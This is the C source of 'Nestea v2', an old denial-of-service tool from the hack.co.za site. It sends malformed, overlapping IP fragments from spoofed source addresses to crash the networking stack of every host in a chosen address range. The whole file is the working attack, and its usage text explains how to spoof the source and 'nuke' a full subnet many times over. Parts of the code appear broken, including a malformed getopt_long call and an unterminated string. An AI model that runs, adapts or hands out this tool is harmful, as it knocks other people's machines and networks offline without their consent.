#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256    /* datagram frame padding for first packet */
#define COUNT   500    /* we are overwriting a small number of bytes we 
                        shouldnt have access to in the kernel. 
                        to be safe, we should hit them till they die :>  */
struct ipstuph
{
        int p1;
        int p2;
        int p3;
        int p4;
} startip, endip;

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    char hit_ip[18], dst_ip2[18];
    struct in_addr addr;
    
    fprintf(stderr, "\n[1;34mNestea v2 [0;34moriginally by[0m: [1;34mhumble [0;34m+ [1;34mttol mods[0m\n");
    fprintf(stderr, "[0;34mColor and Instructions was done by [0m: [1;34mttol[0m\n");
    fprintf(stderr, "[1;34mNote[0m : [1;34mttol released Nestea v2.  humble had nothing to do with \n       it, don't nag him ab
out it.  -ttol@ttol.net[0m\n\n");
    
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("[1;34mraw socket[0m");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 4) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "[1;34mWhat the hell kind of IP address is that?[0m\n");
        exit(1);
    }

    strcpy(dst_ip2,argv[3]);
    if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3,
                      &startip.p4) != 4)
    {
      fprintf(stderr, "[1;34mError, arg2(startip) [0m: [0;34mNeed an ip that contains 4 zones[0m\n");                           
      exit(1);
    }
    if (startip.p1 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p2 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p3 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p4 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of start ip is incorret \
                       (greater than 255)[0m\n");
       exit(1);
    }
    if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3,
                      &endip.p4) != 4)
    {
      fprintf(stderr, "[1;34mError, arg3(endip) [0m: [[0;34mNeed an ip that \
                       contains 4 zones[[0m\n");
      exit(1);
    }
    if (endip.p1 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of end ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p2 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of end ip is incorrect \
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p3 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of end ip is incorrect
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (endip.p4 > 255) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 4 of end ip is incorrect
                       (greater than 255)[0m\n");
      exit(1);
    }
    if (startip.p1 != endip.p1) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 1 of start ip and end ip is different[0m\n");
      exit(1);
    }
    if (startip.p2 != endip.p2) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 2 of start ip and end ip is different[0m\n");
      exit(1);
    }
    if (startip.p3 != endip.p3) {
      fprintf(stderr, "[1;34mError [0m: [0;34mZone 3 of start ip and end ip is different[0m\n");
      exit(1);
    }
                                        
    while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            case 'q':               /* quiet mode */
                bequiet = 1;
                break;                                                      
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "[1;34mDeath [0;34mon flaxen wings ([1;34myet again[0;34m)[0m:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "[1;34mFrom[0m: [0;34m%15s.%d[0m\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  [1;34mTo[0m: [0;34m%15s - %s.%d[0m\n", inet_ntoa(addr), 
                                            dst_ip2, dst_prt);
    fprintf(stderr, " [1;34mAmt[0m: [0;34m%5d[0m\n", count);

    if (bequiet) fprintf(stderr, "[0;34m[[1;34mquiet mode[0;34m] [0;34mEach'[1;34m.[0;34m' represents a nuked ip.  [0;34m[[0m");
    for (j=startip.p4; j <= endip.p4; j++)
    {
      sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
      
      if (!(bequiet)) fprintf(stderr, "[0;34m%s [1;34m[ [0m", hit_ip);
                   
      if (!(dst_ip = name_resolve(hit_ip)))
    {
          fprintf(stderr, "[0;34mWhat the [1;34mhell [0;34mkind of IP address is that?[0m\n");
          exit(1);
    }
                                        
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        if (!(bequiet)) fprintf(stderr, "[0;34md[1;34m00[0;34mm [0m");          
        usleep(500);
    }
    if (bequiet) fprintf(stderr, "[1;34m.[0m");
    else fprintf(stderr, "[0;34m][0m\n");
    }
    if (bequiet) fprintf(stderr, "[0;34m][0m\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

        for(i=0;i<PADDING;i++)
        {
                p_ptr[i++]=random()%255;
        }       

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
"[1;34mnestea2 [0;34msource startIP endIP [1;34m[[0;34m-s src port[1;34m] [[0;34m-t dest port[1;34m] [[0;34m-n quantity[1;34m] [
[0;34m-q[1;34m][0m\n");
    fprintf(stderr, "[0;34msource   [0m: [1;34mThis is the source IP to nestea from, make it a spoof[0m\n");
    fprintf(stderr, "[0;34mstartIP  [0m: [1;34mFrom which IP should we start from? [1;34m([0;34meg 153.35.85.1[1;34m)[0m\n");
    fprintf(stderr, "[0;34mendIP    [0m: [1;34mFrom which IP should we end with?   [1;34m([0;34meg 153.35.95.255[1;34m)[0m\n");
    fprintf(stderr, "[0;34msrc port [0m: [1;34mThis is the source port to spoof from [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
    fprintf(stderr, "[0;34mdest port[0m: [1;34mThis is the destination port to nestea to [1;34m([0;34mOPTIONAL[1;34m)[0m\n");
    fprintf(stderr, "[0;34mquantity [0m: [1;34mThis is how many times to nestea the victim [1;34m([0;34mperfered is 1000[1;34m)[
0m\n");
    fprintf(stderr, "[0;34m-q       [0m: [1;34mThis is quiet mode so you don't see the [0;34md[1;34m00[0;34mm[1;34m's[0m\n\n");
    fprintf(stderr, "[0;34mExample  [0m: [1;34mnestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000[0m\n");
    fprintf(stderr, "[0;34mThe above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1
000 times[0m\n");
    fprintf(stderr, "[0;34mExample2 [0m: [1;34mnestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000[0m\n");
    fprintf(stderr, "[0;34mThe above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times[0m\n");
    fprintf(stderr, "[1;34mI perfer example2, probably because it is the lazy man's way out[0m\n\n");
    fprintf(stderr, "                             [1;5;34mNOT TO BE DISTRIBUTED![0m\n");
     exit(0);

}
/*                    www.hack.co.za                    */